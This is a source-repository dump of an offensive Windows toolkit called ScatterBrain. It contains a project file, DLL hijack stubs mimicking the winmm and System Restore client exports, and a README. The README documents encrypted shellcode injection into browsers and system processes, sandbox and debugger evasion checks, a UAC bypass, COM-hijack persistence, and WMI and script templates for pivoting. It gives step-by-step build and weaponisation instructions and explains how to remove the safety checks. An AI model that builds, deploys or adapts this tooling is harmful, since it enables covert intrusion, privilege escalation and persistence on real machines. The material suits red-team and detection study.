276 | }
277 | }
278 | }
279 |
--------------------------------------------------------------------------------
/ScatterBrain/ScatterBrain.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 15.0
23 | {B59D77D7-D8DB-45DB-9B1F-0795FA32459C}
24 | Win32Proj
25 | ScatterBrain
26 | 10.0.17763.0
27 | ScatterBrain
28 |
29 |
30 |
31 | DynamicLibrary
32 | true
33 | v142
34 | Unicode
35 |
36 |
37 | Application
38 | false
39 | v142
40 | true
41 | Unicode
42 |
43 |
44 | Application
45 | true
46 | v142
47 | Unicode
48 | false
49 |
50 |
51 | DynamicLibrary
52 | false
53 | v142
54 | true
55 | Unicode
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 | true
77 |
78 |
79 | true
80 |
81 |
82 | false
83 |
84 |
85 | false
86 |
87 |
88 |
89 | Use
90 | Level3
91 | Disabled
92 | true
93 | WIN32;_DEBUG;USAIN_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
94 | true
95 |
96 |
97 | Windows
98 | true
99 |
100 |
101 |
102 |
103 | Use
104 | Level3
105 | Disabled
106 | true
107 | _DEBUG;USAIN_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
108 | true
109 |
110 |
111 | Console
112 | true
113 | kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;shlwapi.lib;Iphlpapi.lib;netapi32.lib;wintrust.lib;%(AdditionalDependencies)
114 |
115 |
116 |
117 |
118 | Use
119 | Level3
120 | MaxSpeed
121 | true
122 | true
123 | true
124 | WIN32;NDEBUG;USAIN_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
125 | true
126 |
127 |
128 | Console
129 | true
130 | true
131 | true
132 | kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;shlwapi.lib;Iphlpapi.lib;netapi32.lib;wintrust.lib;%(AdditionalDependencies)
133 |
134 |
135 |
136 |
137 | Use
138 | Level3
139 | MaxSpeed
140 | true
141 | true
142 | true
143 | NDEBUG;USAIN_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
144 | true
145 | MultiThreaded
146 |
147 |
148 | Console
149 | true
150 | true
151 | true
152 | kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;shlwapi.lib;Iphlpapi.lib;netapi32.lib;wintrust.lib;%(AdditionalDependencies)
153 | Yes
154 |
155 |
156 | if "$(ConfigurationName)" == "Release" (copy $(ProjectDir)..\x64\Release\ScatterBrain.dll $(ProjectDir)..\SharpWMI\SharpWMI\Resources\ScatterBrain.dll /Y && copy $(ProjectDir)..\x64\Release\ScatterBrain.dll $(ProjectDir)..\DWELLS\data1.bin /Y && copy $(ProjectDir)..\x64\Release\ScatterBrain.dll $(ProjectDir)..\AccessibilityFeaturesPersistence\Resources\ScatterBrain.dll /Y)
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 | Create
188 | Create
189 | Create
190 | Create
191 |
192 |
193 |
194 |
195 |
196 |
197 |
198 |
--------------------------------------------------------------------------------
/ScatterBrain/HijackStubs.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "stdafx.h"
3 |
// Exported hijack stubs (see the README section "A Note on Exported Stubs").
//
// Every symbol below is exported with C linkage as a no-argument void function.
// The names appear to mirror the export table of the Windows multimedia API
// (winmm.dll: CloseDriver .. wod32Message) followed by the System Restore
// client (srclient.dll: DisableSR .. SysprepGeneralize). The bodies are defined
// elsewhere in the project and are not visible in this header.
//
// NOTE(review): these prototypes are not the genuine signatures, so any caller
// that reaches one of them through the real prototype gets an ABI-mismatched
// call; presumably they exist only so that import resolution succeeds when this
// module is loaded in place of the original library — confirm against the
// DWELLS project.
//
// Detection note: a single module exporting this combined set of multimedia and
// System Restore names from a user-writable path is the observable artifact of
// this technique.
extern "C" __declspec(dllexport) void CloseDriver();
extern "C" __declspec(dllexport) void DefDriverProc();
extern "C" __declspec(dllexport) void DriverCallback();
extern "C" __declspec(dllexport) void DrvGetModuleHandle();
extern "C" __declspec(dllexport) void GetDriverModuleHandle();
extern "C" __declspec(dllexport) void NotifyCallbackData();
extern "C" __declspec(dllexport) void OpenDriver();
extern "C" __declspec(dllexport) void PlaySound();
extern "C" __declspec(dllexport) void PlaySoundA();
extern "C" __declspec(dllexport) void PlaySoundW();
extern "C" __declspec(dllexport) void SendDriverMessage();
extern "C" __declspec(dllexport) void WOW32DriverCallback();
extern "C" __declspec(dllexport) void WOW32ResolveMultiMediaHandle();
extern "C" __declspec(dllexport) void WOWAppExit();
extern "C" __declspec(dllexport) void aux32Message();
extern "C" __declspec(dllexport) void auxGetDevCapsA();
extern "C" __declspec(dllexport) void auxGetDevCapsW();
extern "C" __declspec(dllexport) void auxGetNumDevs();
extern "C" __declspec(dllexport) void auxGetVolume();
extern "C" __declspec(dllexport) void auxOutMessage();
extern "C" __declspec(dllexport) void auxSetVolume();
extern "C" __declspec(dllexport) void joy32Message();
extern "C" __declspec(dllexport) void joyConfigChanged();
extern "C" __declspec(dllexport) void joyGetDevCapsA();
extern "C" __declspec(dllexport) void joyGetDevCapsW();
extern "C" __declspec(dllexport) void joyGetNumDevs();
extern "C" __declspec(dllexport) void joyGetPos();
extern "C" __declspec(dllexport) void joyGetPosEx();
extern "C" __declspec(dllexport) void joyGetThreshold();
extern "C" __declspec(dllexport) void joyReleaseCapture();
extern "C" __declspec(dllexport) void joySetCapture();
extern "C" __declspec(dllexport) void joySetThreshold();
extern "C" __declspec(dllexport) void mci32Message();
extern "C" __declspec(dllexport) void mciDriverNotify();
extern "C" __declspec(dllexport) void mciDriverYield();
extern "C" __declspec(dllexport) void mciExecute();
extern "C" __declspec(dllexport) void mciFreeCommandResource();
extern "C" __declspec(dllexport) void mciGetCreatorTask();
extern "C" __declspec(dllexport) void mciGetDeviceIDA();
extern "C" __declspec(dllexport) void mciGetDeviceIDFromElementIDA();
extern "C" __declspec(dllexport) void mciGetDeviceIDFromElementIDW();
extern "C" __declspec(dllexport) void mciGetDeviceIDW();
extern "C" __declspec(dllexport) void mciGetDriverData();
extern "C" __declspec(dllexport) void mciGetErrorStringA();
extern "C" __declspec(dllexport) void mciGetErrorStringW();
extern "C" __declspec(dllexport) void mciGetYieldProc();
extern "C" __declspec(dllexport) void mciLoadCommandResource();
extern "C" __declspec(dllexport) void mciSendCommandA();
extern "C" __declspec(dllexport) void mciSendCommandW();
extern "C" __declspec(dllexport) void mciSendStringA();
extern "C" __declspec(dllexport) void mciSendStringW();
extern "C" __declspec(dllexport) void mciSetDriverData();
extern "C" __declspec(dllexport) void mciSetYieldProc();
extern "C" __declspec(dllexport) void mid32Message();
extern "C" __declspec(dllexport) void midiConnect();
extern "C" __declspec(dllexport) void midiDisconnect();
extern "C" __declspec(dllexport) void midiInAddBuffer();
extern "C" __declspec(dllexport) void midiInClose();
extern "C" __declspec(dllexport) void midiInGetDevCapsA();
extern "C" __declspec(dllexport) void midiInGetDevCapsW();
extern "C" __declspec(dllexport) void midiInGetErrorTextA();
extern "C" __declspec(dllexport) void midiInGetErrorTextW();
extern "C" __declspec(dllexport) void midiInGetID();
extern "C" __declspec(dllexport) void midiInGetNumDevs();
extern "C" __declspec(dllexport) void midiInMessage();
extern "C" __declspec(dllexport) void midiInOpen();
extern "C" __declspec(dllexport) void midiInPrepareHeader();
extern "C" __declspec(dllexport) void midiInReset();
extern "C" __declspec(dllexport) void midiInStart();
extern "C" __declspec(dllexport) void midiInStop();
extern "C" __declspec(dllexport) void midiInUnprepareHeader();
extern "C" __declspec(dllexport) void midiOutCacheDrumPatches();
extern "C" __declspec(dllexport) void midiOutCachePatches();
extern "C" __declspec(dllexport) void midiOutClose();
extern "C" __declspec(dllexport) void midiOutGetDevCapsA();
extern "C" __declspec(dllexport) void midiOutGetDevCapsW();
extern "C" __declspec(dllexport) void midiOutGetErrorTextA();
extern "C" __declspec(dllexport) void midiOutGetErrorTextW();
extern "C" __declspec(dllexport) void midiOutGetID();
extern "C" __declspec(dllexport) void midiOutGetNumDevs();
extern "C" __declspec(dllexport) void midiOutGetVolume();
extern "C" __declspec(dllexport) void midiOutLongMsg();
extern "C" __declspec(dllexport) void midiOutMessage();
extern "C" __declspec(dllexport) void midiOutOpen();
extern "C" __declspec(dllexport) void midiOutPrepareHeader();
extern "C" __declspec(dllexport) void midiOutReset();
extern "C" __declspec(dllexport) void midiOutSetVolume();
extern "C" __declspec(dllexport) void midiOutShortMsg();
extern "C" __declspec(dllexport) void midiOutUnprepareHeader();
extern "C" __declspec(dllexport) void midiStreamClose();
extern "C" __declspec(dllexport) void midiStreamOpen();
extern "C" __declspec(dllexport) void midiStreamOut();
extern "C" __declspec(dllexport) void midiStreamPause();
extern "C" __declspec(dllexport) void midiStreamPosition();
extern "C" __declspec(dllexport) void midiStreamProperty();
extern "C" __declspec(dllexport) void midiStreamRestart();
extern "C" __declspec(dllexport) void midiStreamStop();
extern "C" __declspec(dllexport) void mixerClose();
extern "C" __declspec(dllexport) void mixerGetControlDetailsA();
extern "C" __declspec(dllexport) void mixerGetControlDetailsW();
extern "C" __declspec(dllexport) void mixerGetDevCapsA();
extern "C" __declspec(dllexport) void mixerGetDevCapsW();
extern "C" __declspec(dllexport) void mixerGetID();
extern "C" __declspec(dllexport) void mixerGetLineControlsA();
extern "C" __declspec(dllexport) void mixerGetLineControlsW();
extern "C" __declspec(dllexport) void mixerGetLineInfoA();
extern "C" __declspec(dllexport) void mixerGetLineInfoW();
extern "C" __declspec(dllexport) void mixerGetNumDevs();
extern "C" __declspec(dllexport) void mixerMessage();
extern "C" __declspec(dllexport) void mixerOpen();
extern "C" __declspec(dllexport) void mixerSetControlDetails();
extern "C" __declspec(dllexport) void mmDrvInstall();
extern "C" __declspec(dllexport) void mmGetCurrentTask();
extern "C" __declspec(dllexport) void mmTaskBlock();
extern "C" __declspec(dllexport) void mmTaskCreate();
extern "C" __declspec(dllexport) void mmTaskSignal();
extern "C" __declspec(dllexport) void mmTaskYield();
extern "C" __declspec(dllexport) void mmioAdvance();
extern "C" __declspec(dllexport) void mmioAscend();
extern "C" __declspec(dllexport) void mmioClose();
extern "C" __declspec(dllexport) void mmioCreateChunk();
extern "C" __declspec(dllexport) void mmioDescend();
extern "C" __declspec(dllexport) void mmioFlush();
extern "C" __declspec(dllexport) void mmioGetInfo();
extern "C" __declspec(dllexport) void mmioInstallIOProcA();
extern "C" __declspec(dllexport) void mmioInstallIOProcW();
extern "C" __declspec(dllexport) void mmioOpenA();
extern "C" __declspec(dllexport) void mmioOpenW();
extern "C" __declspec(dllexport) void mmioRead();
extern "C" __declspec(dllexport) void mmioRenameA();
extern "C" __declspec(dllexport) void mmioRenameW();
extern "C" __declspec(dllexport) void mmioSeek();
extern "C" __declspec(dllexport) void mmioSendMessage();
extern "C" __declspec(dllexport) void mmioSetBuffer();
extern "C" __declspec(dllexport) void mmioSetInfo();
extern "C" __declspec(dllexport) void mmioStringToFOURCCA();
extern "C" __declspec(dllexport) void mmioStringToFOURCCW();
extern "C" __declspec(dllexport) void mmioWrite();
extern "C" __declspec(dllexport) void mmsystemGetVersion();
extern "C" __declspec(dllexport) void mod32Message();
extern "C" __declspec(dllexport) void mxd32Message();
extern "C" __declspec(dllexport) void sndPlaySoundA();
extern "C" __declspec(dllexport) void sndPlaySoundW();
extern "C" __declspec(dllexport) void tid32Message();
extern "C" __declspec(dllexport) void timeBeginPeriod();
extern "C" __declspec(dllexport) void timeEndPeriod();
extern "C" __declspec(dllexport) void timeGetDevCaps();
extern "C" __declspec(dllexport) void timeGetSystemTime();
extern "C" __declspec(dllexport) void timeGetTime();
extern "C" __declspec(dllexport) void timeKillEvent();
extern "C" __declspec(dllexport) void timeSetEvent();
extern "C" __declspec(dllexport) void waveInAddBuffer();
extern "C" __declspec(dllexport) void waveInClose();
extern "C" __declspec(dllexport) void waveInGetDevCapsA();
extern "C" __declspec(dllexport) void waveInGetDevCapsW();
extern "C" __declspec(dllexport) void waveInGetErrorTextA();
extern "C" __declspec(dllexport) void waveInGetErrorTextW();
extern "C" __declspec(dllexport) void waveInGetID();
extern "C" __declspec(dllexport) void waveInGetNumDevs();
extern "C" __declspec(dllexport) void waveInGetPosition();
extern "C" __declspec(dllexport) void waveInMessage();
extern "C" __declspec(dllexport) void waveInOpen();
extern "C" __declspec(dllexport) void waveInPrepareHeader();
extern "C" __declspec(dllexport) void waveInReset();
extern "C" __declspec(dllexport) void waveInStart();
extern "C" __declspec(dllexport) void waveInStop();
extern "C" __declspec(dllexport) void waveInUnprepareHeader();
extern "C" __declspec(dllexport) void waveOutBreakLoop();
extern "C" __declspec(dllexport) void waveOutClose();
extern "C" __declspec(dllexport) void waveOutGetDevCapsA();
extern "C" __declspec(dllexport) void waveOutGetDevCapsW();
extern "C" __declspec(dllexport) void waveOutGetErrorTextA();
extern "C" __declspec(dllexport) void waveOutGetErrorTextW();
extern "C" __declspec(dllexport) void waveOutGetID();
extern "C" __declspec(dllexport) void waveOutGetNumDevs();
extern "C" __declspec(dllexport) void waveOutGetPitch();
extern "C" __declspec(dllexport) void waveOutGetPlaybackRate();
extern "C" __declspec(dllexport) void waveOutGetPosition();
extern "C" __declspec(dllexport) void waveOutGetVolume();
extern "C" __declspec(dllexport) void waveOutMessage();
extern "C" __declspec(dllexport) void waveOutOpen();
extern "C" __declspec(dllexport) void waveOutPause();
extern "C" __declspec(dllexport) void waveOutPrepareHeader();
extern "C" __declspec(dllexport) void waveOutReset();
extern "C" __declspec(dllexport) void waveOutRestart();
extern "C" __declspec(dllexport) void waveOutSetPitch();
extern "C" __declspec(dllexport) void waveOutSetPlaybackRate();
extern "C" __declspec(dllexport) void waveOutSetVolume();
extern "C" __declspec(dllexport) void waveOutUnprepareHeader();
extern "C" __declspec(dllexport) void waveOutWrite();
extern "C" __declspec(dllexport) void wid32Message();
extern "C" __declspec(dllexport) void wod32Message();
// System Restore client exports start here.
extern "C" __declspec(dllexport) void DisableSR();
extern "C" __declspec(dllexport) void DisableSRInternal();
extern "C" __declspec(dllexport) void EnableSR();
extern "C" __declspec(dllexport) void EnableSREx();
extern "C" __declspec(dllexport) void EnableSRInternal();
extern "C" __declspec(dllexport) void SRNewSystemId();
extern "C" __declspec(dllexport) void SRRemoveRestorePoint();
extern "C" __declspec(dllexport) void SRSetRestorePointA();
extern "C" __declspec(dllexport) void SRSetRestorePointInternal();
extern "C" __declspec(dllexport) void SRSetRestorePointW();
extern "C" __declspec(dllexport) void SetSRStateAfterSetup();
extern "C" __declspec(dllexport) void SysprepCleanup();
extern "C" __declspec(dllexport) void SysprepGeneralize();
209 |
210 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Author's Note
2 |
3 | This project may or may not be in a broken state. You may have build or compilation issues. This note is just a masquerade for a disclaimer to tell you, dear reader, that I cannot help you should you run into problems. It is up to you to trundle through the Visual Studio error messages and find your way to both compilation and nirvana. If you fail to persevere, may Lord Umbasa have mercy on your soul.
4 |
5 | # ScatterBrain Suite
6 |
7 | ScatterBrain is a shell code runner with a variety of execution and elevation options. Given unencoded shellcode, it will then be encoded with the XOR key `SecretKey` (found in `Cryptor/Program.cs` and `ScatterBrain/Headers/RawData.h`) using the Cryptor binary. Cryptor.exe generates an `encrypted.bin`, which can be copied into `ScatterBrain/Headers/RawData.h`. You can then build ScatterBrain as a DLL which can be leveraged in one of the templates. Additionally, this will build the .NET Profiler UAC Bypass to use in your operations.
8 |
9 | ## Table of Contents
10 | - [Cryptor](#Cryptor)
11 | - [ScatterBrain](#ScatterBrain)
12 | - [CheckPlease Integration](#CheckPlease-Integration)
13 | - [UTC Timezone](#UTC-Timezone)
14 | - [USB History](#USB-History)
15 | - [Domain Joined](#Domain-Joined)
16 | - [Username Exists](#Username-Exists)
17 | - [Computername Exists](#Computername-Exists)
18 | - [Sandbox Registry Key Checks](#Sandbox-Registry-Key-Checks)
19 | - [RAM Requirements](#RAM-Requirements)
20 | - [Processor Requirements](#Processor-Requirements)
21 | - [Minimum Number of Processes](#Minimum-Number-Of-Processes)
22 | - [VM Network Adapters](#VM-Network-Adapters)
23 | - [VM Drivers Installed](#VM-Drivers-Installed)
24 | - [Sandbox DLLs](#Sandbox-DLLs)
25 | - [Debugger Attached](#Debugger-Attached)
26 | - [Process Tree Validation](#Process-Tree-Validation)
27 |
28 | - [DWELLS (UAC Bypass)](#DWELLS)
29 | - [Accessibility Features Persistence](#Accessibility-Features-Persistence)
30 | - [Templates](#Templates)
31 | - [Registry Free COM Activation](#Registry-Free-COM-Activation)
32 | - [WMI](#WMI)
33 | - [Video Demo](#Video-Demo)
34 |
35 | ## Requirements
36 | - [HxD Hex Editor](https://mh-nexus.de/en/hxd/)
37 | - Alternatively, a way to programmatically copy the encoded shellcode to a C char array.
38 |
39 | # Cryptor
40 |
41 | ## Description
42 |
43 | Cryptor is a simple .NET binary that encodes your shellcode with the hardcoded key `SecretKey` and generates the encrypted shellcode file.
44 |
45 | ## Cryptor Usage
46 | 1. Copy beacon.bin to the same directory as Cryptor.exe.
47 | 2. Run it by: `.\Cryptor.exe beacon.bin`. This will generate the encrypted.bin file.
48 |
49 | # ScatterBrain
50 |
51 | ## Description
52 |
53 | ScatterBrain is a shellcode runner that uses process injection based on the integrity level of the executing process to run its code. Process injection is done via CreateRemoteThread in a suspended state using the file backing of LoadLibraryA, then updating the Thread's context to point to our allocated shellcode and executing. (See: https://blog.xpnsec.com/undersanding-and-evading-get-injectedthread/)
54 |
55 | If executing from a medium integrity process, ScatterBrain will attempt the following search order for binaries:
56 | 1. Default application handler for HTTPS connections.
57 | 2. Brute-force file existence on Chrome, Chrome SxS and FireFox.
58 | 3. Chat applications installed on the machine (such as Slack and Skype).
59 |
60 | If executing from a high integrity context, or if the above fails to resolve any binary, then the application will randomly select one of the following:
61 | - splwow64.exe
62 | - printfilterpipelinesvc.exe
63 | - PrintIsolationHost.exe
64 | - spoolsv.exe
65 | - upnpcont.exe
66 | - conhost.exe
67 | - convertvhd.exe
68 |
69 | It performs mild evasion of analysis and signature-based tools by never writing the full, unencoded shellcode as one contiguous memory chunk. Think heap spray, but within a single allocated memory segment until all available space has been written to.
70 |
71 | The main working function of this file is `MonsterMind` located in `scatterbrain.cpp`. If you wanted to, for example, remove all safety checks, this is where you'd modify that behavior.
72 |
73 | ## A Note on Exported Stubs
74 |
75 | As the project stands, it builds itself using several exported functions that serve as hijack stubs for the DWELLS project. More on it can be found in the [DWELLS](#DWELLS) section.
76 |
77 | ## CheckPlease Integration
78 |
79 | Integrated into this project is CheckPlease, which is capable of doing several anti-sandbox and anti-analysis checks to ensure the payload does not detonate under a false pretense.
80 |
81 | If you wish to change the way "Safe" is defined, you'll need to edit the function `SafeToExecute` in `CheckPlease.cpp`. By default, it checks that:
82 | - Execution occurs within UTC Timezone
83 | - The computer it executes on has a ComputerName
84 | - The process tree from which it is currently executing consists of binaries signed by Microsoft.
85 |
86 | A full list of options to check for are as follows:
87 |
88 | ### UTC Timezone
89 |
90 | Checks the payload is executing in a valid timezone. Function: `IsUTCTimeZone`
91 |
92 | ### USB History
93 |
94 | Ensures that at least one USB drive has been connected to the machine. Function: `HasUSBHistory`
95 |
96 | ### Domain Joined
97 |
98 | Ensures the computer is joined to a domain, with option to specify the domain in which it should be joined. Function: `IsDomainJoined`
99 |
100 | ### Username Exists
101 |
102 | Ensures the username is retrievable and that the username is not User. Lots of images/sandboxes spin up with this default username. Function: `HasUsername`
103 |
104 | ### ComputerName Exists
105 |
106 | Ensures the environment has a retrievable ComputerName. Function: `HasComputerName`
107 |
108 | ### Sandbox Registry Key checks
109 |
110 | This checks several different registry keys to see if the environment is a VMware or Oracle VirtualBox guest. Function: `HasSandboxRegistryKeys`
111 |
112 | ### Ram Requirements
113 |
114 | Checks whether the current executing environment has at least 4 GB of RAM installed. Function: `HasMinRAM`
115 |
116 | ### Processor Requirements
117 |
118 | Ensures the computer has a minimum number of processor cores before executing. Minimum: 2. Function: `HasNumberOfProcessors`
119 |
120 | ### Minimum Number of Processes
121 |
122 | Ensures that the computer being detonated on has at least 50 processes running. Could up this to 75 potentially. Function: `HasMinNumProcesses`
123 |
124 | ### Bad Processes Running
125 |
126 | Enumerate the current processes running and cross check them against a list of bad processes known to be run in malware analysis toolkits or VMs. Function: `BadProcessesRunning`
127 |
128 | ### VM Network Adapters
129 |
130 | This checks to see if the computer has any VM network adapters associated to it by cross-referencing its MAC address. Function: `HasVMMacAddress`
131 |
132 | ### VM Drivers Installed
133 |
134 | Check for the presence of drivers on disk that indicate this is a virtual machine. Function: `VMDriversPresent`
135 |
136 | ### Sandbox DLLs
137 |
138 | Checks for DLLs on disk that indicate the executing process is running under a VM. Function: `HasSandboxDLLs`
139 |
140 | ### Debugger Attached
141 |
142 | Checks to see if a remote debugger has been attached to the executing process. This is done via the API call and not the IsDebugged flag, which is always set to true in newer versions of Windows.
143 |
144 | ### Process Tree Validation
145 |
146 | Check the current process tree to see if the payload is detonating in a suspicious manner. Namely, if any parent process of the executable has an unsigned parent, or a parent whose signature does not match Microsoft Windows Production, this will return FALSE. Function: `HasBadParentProcess`
147 |
148 | ## ScatterBrain Usage
149 |
150 | 1. Ensure that in the Project Properties you are building as a DLL. (Note: this matters if you want the UAC bypass binary built at the same time; otherwise that build will fail.)
151 |
152 | 2. Open encrypted.bin in HxD (https://mh-nexus.de/en/hxd/)
153 |
154 | 
155 |
156 | 3. Ctrl+A and click Edit -> Copy As -> C
157 |
158 | 
159 |
160 | 4. Open `RawData.h` in the ScatterBrain project and paste like so (note: From HxD, this is automatically formatted):
161 |
162 | 
163 |
164 | 5. Build Release x64 of ScatterBrain. Upon build completion the DLL will be copied to the DNH project's Resources directory.
165 |
166 | ## Example Runtime
167 | 
168 |
169 | # DWELLS
170 |
171 | ## Description
172 |
173 | DWELLS is a UAC bypass that gains privileged code execution by creating mock Windows directories. The technique write-up is available here: https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e
174 |
175 | ## Usage
176 |
177 | 1. Ensure ScatterBrain is set to build as a DLL.
178 | 2. Build the DWELLS project.
179 | 3. Execute the binary with no arguments to run the shellcode at high integrity.
180 |
181 | ## Usage Notes
182 |
183 | The high-integrity beacon will spawn without the usual administrative privileges. To regain the expected privileges, run `getpriv` from the new beacon.
184 |
185 | Further, if you wanted to create a `shinject`-able version of the DLL, you would need to remove the embedded resource and instead create a char array of ScatterBrain.dll and write the file accordingly. For the sake of automation, the executable route was taken. If you do pursue the `shinject` route, use Nick Landers' sRDI project to convert DWELLS.dll into shellcode. (https://github.com/monoxgas/sRDI/blob/master/PowerShell/ConvertTo-Shellcode.ps1).
186 |
187 | # Accessibility Features Persistence
188 |
189 | ## Description
190 |
191 | Accessibility Features Persistence is derived from a technique in the Vault 7 leak: it registers a new COM object under `HKCU:\Software\Classes\CLSID\`. Once registered, it drops the payload to disk in one of several locations within APPDATA and then creates a junction folder based on the drop location. The payload executes:
192 |
193 | 1. upon first installation of the payload;
194 | 2. when the system has restarted;
195 | 3. when more than one day has passed.
196 |
197 | **Important note:** You **must** record the GUID generated during installation so the implant can be removed cleanly. Otherwise you will have to hunt down the GUID in the registry, which is tedious.
198 |
199 | ## Usage
200 |
201 | ```
202 | Usage:
203 | Arguments:
204 | install - Installs the agent.
205 | uninstall {CLSID} - Uninstalls the given CLSID.
206 |
207 | Examples:
208 | .\AccessibilityFeaturesPersistence.exe install
209 | .\AccessibilityFeaturesPersistence.exe uninstall "{a3df199e-bc97-4c87-ada6-4b5287a0d9e5}"
210 | ```
211 |
212 | ## References
213 |
214 | https://vanmieghem.io/persisting-like-a-cia-agent/
215 |
216 | # Templates
217 |
218 | I've included a handful of templates that are simple enough to plug and play. The only change that needs to be made to each template is to base64 encode the ScatterBrain.dll and insert it into the templates.
219 |
220 | ## Registry Free COM Activation
221 |
222 | Registry-free COM activation is an excellent way to export this DLL into a variety of formats, be it JScript, VBScript, VBApplications, WMI event consumers and more. To do so I've built templates for both jscript and vbscript that only require the user to replace the DLL bytes where the templates say `B64_DLL_BYTES_GO_HERE`. To do so (from powershell), issue a `[System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes("$PWD\x64\Release\ScatterBrain.dll")) | clip`. Then paste the base64 string into one of the templates (note the trailing new line if you used `clip`-- you'll want to delete that to be syntactically correct). Now you have a working payload that should work in VBScript or JScript!
223 |
224 | ## WMI
225 |
226 | Once you have weaponized the corresponding JScript or VBScript templates from above, paste the code into the corresponding `regfree_com_activation_templates/wmi.ps1` file or SharpWMI's `Program.cs` and rebuild SharpWMI. You'll be all set to pivot using the DLL.
227 |
228 | # Video Demo
229 |
230 | ## Demo of setting up your first payload:
231 | [](https://drive.google.com/open?id=1SoHH9rNDb4I-ohelkw4NxYHo1RGriHBQ)
232 |
233 | ## Demo of default safety checks
234 | [](https://drive.google.com/open?id=1-cGYueV9VtNRbAIPQaNayU19zjwwsjeC)
235 |
--------------------------------------------------------------------------------
/ScatterBrain/HijackStubs.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 |
// Empty, C-linkage exports: no bodies and no forwarding to a genuine
// implementation. The names from CloseDriver through wod32Message appear to
// mirror the export table of winmm.dll (PlaySound, wave*/midi*/mixer*/mmio*/
// time* ...) and DisableSR through SysprepGeneralize that of srclient.dll
// (System Restore) -- TODO confirm against the real export tables.
// Presumably the point is that a module built from this file presents the
// export names a host expects when it is placed where that DLL would be
// loaded (the load path is not shown in this file). A caller that actually
// invokes one of these stubs gets a no-op, so whatever host feature depends on
// that export silently stops working.
extern "C" __declspec(dllexport) void CloseDriver()
{}
extern "C" __declspec(dllexport) void DefDriverProc()
{}
extern "C" __declspec(dllexport) void DriverCallback()
{}
extern "C" __declspec(dllexport) void DrvGetModuleHandle()
{}
extern "C" __declspec(dllexport) void GetDriverModuleHandle()
{}
extern "C" __declspec(dllexport) void NotifyCallbackData()
{}
extern "C" __declspec(dllexport) void OpenDriver()
{}
extern "C" __declspec(dllexport) void PlaySound()
{}
extern "C" __declspec(dllexport) void PlaySoundA()
{}
extern "C" __declspec(dllexport) void PlaySoundW()
{}
extern "C" __declspec(dllexport) void SendDriverMessage()
{}
extern "C" __declspec(dllexport) void WOW32DriverCallback()
{}
extern "C" __declspec(dllexport) void WOW32ResolveMultiMediaHandle()
{}
extern "C" __declspec(dllexport) void WOWAppExit()
{}
extern "C" __declspec(dllexport) void aux32Message()
{}
extern "C" __declspec(dllexport) void auxGetDevCapsA()
{}
extern "C" __declspec(dllexport) void auxGetDevCapsW()
{}
extern "C" __declspec(dllexport) void auxGetNumDevs()
{}
extern "C" __declspec(dllexport) void auxGetVolume()
{}
extern "C" __declspec(dllexport) void auxOutMessage()
{}
extern "C" __declspec(dllexport) void auxSetVolume()
{}
extern "C" __declspec(dllexport) void joy32Message()
{}
extern "C" __declspec(dllexport) void joyConfigChanged()
{}
extern "C" __declspec(dllexport) void joyGetDevCapsA()
{}
extern "C" __declspec(dllexport) void joyGetDevCapsW()
{}
extern "C" __declspec(dllexport) void joyGetNumDevs()
{}
extern "C" __declspec(dllexport) void joyGetPos()
{}
extern "C" __declspec(dllexport) void joyGetPosEx()
{}
extern "C" __declspec(dllexport) void joyGetThreshold()
{}
extern "C" __declspec(dllexport) void joyReleaseCapture()
{}
extern "C" __declspec(dllexport) void joySetCapture()
{}
extern "C" __declspec(dllexport) void joySetThreshold()
{}
extern "C" __declspec(dllexport) void mci32Message()
{}
extern "C" __declspec(dllexport) void mciDriverNotify()
{}
extern "C" __declspec(dllexport) void mciDriverYield()
{}
extern "C" __declspec(dllexport) void mciExecute()
{}
extern "C" __declspec(dllexport) void mciFreeCommandResource()
{}
extern "C" __declspec(dllexport) void mciGetCreatorTask()
{}
extern "C" __declspec(dllexport) void mciGetDeviceIDA()
{}
extern "C" __declspec(dllexport) void mciGetDeviceIDFromElementIDA()
{}
extern "C" __declspec(dllexport) void mciGetDeviceIDFromElementIDW()
{}
extern "C" __declspec(dllexport) void mciGetDeviceIDW()
{}
extern "C" __declspec(dllexport) void mciGetDriverData()
{}
extern "C" __declspec(dllexport) void mciGetErrorStringA()
{}
extern "C" __declspec(dllexport) void mciGetErrorStringW()
{}
extern "C" __declspec(dllexport) void mciGetYieldProc()
{}
extern "C" __declspec(dllexport) void mciLoadCommandResource()
{}
extern "C" __declspec(dllexport) void mciSendCommandA()
{}
extern "C" __declspec(dllexport) void mciSendCommandW()
{}
extern "C" __declspec(dllexport) void mciSendStringA()
{}
extern "C" __declspec(dllexport) void mciSendStringW()
{}
extern "C" __declspec(dllexport) void mciSetDriverData()
{}
extern "C" __declspec(dllexport) void mciSetYieldProc()
{}
extern "C" __declspec(dllexport) void mid32Message()
{}
extern "C" __declspec(dllexport) void midiConnect()
{}
extern "C" __declspec(dllexport) void midiDisconnect()
{}
extern "C" __declspec(dllexport) void midiInAddBuffer()
{}
